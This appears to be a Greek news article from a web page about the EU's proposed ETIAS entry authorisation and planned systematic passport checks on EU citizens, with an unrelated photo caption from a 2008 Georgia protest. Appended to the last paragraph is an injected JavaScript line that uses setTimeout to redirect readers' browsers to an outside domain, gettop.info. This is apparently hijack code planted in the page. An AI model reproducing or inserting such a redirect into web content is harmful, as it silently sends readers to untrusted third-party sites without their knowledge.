Άδεια εισόδου στην ΕΕ για 5 ευρώ

0
4
epa01473857 Georgians hold a European Union flag up during a protest action in Tbilisi, Georgia, 01 September 2008. According to Rustavi 2 Georgian broadcasting company, more than million people across Georgia took part in the action protesting against Russia's military operations in Georgia. Georgian President Mikheil Saakashvili announced 01 September the Day of Georgia's Unity. EPA/ZURAB KURTSIKIDZE

 

Στο πλαίσιο της καταπολέμησης της διεθνούς τρομοκρατίας, της παράνομης μετανάστευσης και του οργανωμένου εγκλήματος η Ευρωπαϊκή Επιτροπή παρουσίασε στις Βρυξέλλες ένα νέο σύστημα χορήγησης άδειας εισόδου ονόματι ETIAS.

Το μέτρο αφορά αμερικανούς πολίτες, Ισραηλινούς, Βραζιλιάνους και Αλγερινούς και όλους εκείνους που εξαιρούνται από την υποχρέωση έκδοσης βίζας για τις χώρες του Σέγκεν.

Η άδεια εισόδου ETIAS θα κοστίζει 5 ευρώ και η συμπλήρωσή της στο διαδίκτυο θα διαρκεί 10 μόλις λεπτά. Από την άδεια εξαιρούνται χώρες όπως η Τουρκία και η Ρωσία, οι πολίτες των οποίων χρειάζονται βίζα για να εισέλθουν στην ΕΕ.

Συστηματικοί συνοριακοί έλεγχοι και ευρωπαϊκών διαβατηρίων

Το νέο σύστημα θα υποχρεώνει από το 2020 τουρίστες και επαγγελματίες να αιτούνται την είσοδό τους στην ΕΕ πριν ξεκινήσουν το ταξίδι τους. Το αίτημα θα γίνεται δεκτό μετά από σύγκριση των δεδομένων του ταξιδιώτη με το περιεχόμενον διεθνών βάσεων δεδομένων όπως των SIS, VIS, SLTD, Eurodac και EES, που αφορούν εντάλματα σύλληψεις, καταγραφή δακτυλικών αποτυπωμάτων κ.ά.

Ακούγεται πολύπλοκο και είναι πράγματι πολύπλοκο, παραδέχεται αξιωματούχος της Κομισιόν, ο οποίος εκτιμά ότι η σύνδεση του ETIAS με τις υπόλοιπες βάσεις δεδομένες θα διαρκέσει τρία χρόνια και θα κοστίσει συνολικά 220 εκατ. ευρώ, όπως δημοσιεύει η Deutsche Welle.

Παράλληλα στο σύστημα ETIAS η Ευρωπαϊκή Επιτροπή σχεδιάζει «συστηματικούς συνοριακούς ελέγχους» για όλους τους πολίτες της ΕΕ. Μέχρι σήμερα διεξάγονται μόνο δειγματοληπτικοί έλεγχοι διαβατηρίων. Σύμφωνα με τα σχέδια της Κομισιόν μέσα στα επόμενα χρόνια θα ξεκινήσει ωστόσο ο συστηματικός έλεγχος όλων όσων εισέρχονται και εξέρχονται στην ΕΕ. Στόχος είναι, μεταξύ άλλων, η σύγκριση των διαβατηρίου με τις ισχύουσες βάσεις δεδομένων για τον ευκολότερο εντοπισμό ισλαμιστών που είναι ευρωπαίοι πολίτες.

Οι ειδικοί της Κομισιόν ωστόσο εκτιμούν ότι η καταγραφή όλων των ταξιδιών ευρωπαίων πολιτών, όπως θα συμβαίνει και με τους πολίτες τρίτων χωρών με η χωρίς υποχρέωση έκδοσης βίζας, είναι μια ιδιαίτερα απαιτητική και χρονοβόρα διαδικασία. Σε αυτόν τον τομέα οι ΗΠΑ έχουν προχωρήσει ήδη παραπέρα. Για παράδειγμα, η αμερικανική υπηρεσία μετανάστευσης USCIS καταγράφει ήδη σήμερα περίπου τις μισές εισόδους και εξόδους Aμερικανών πολιτών από τις ΗΠΑ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here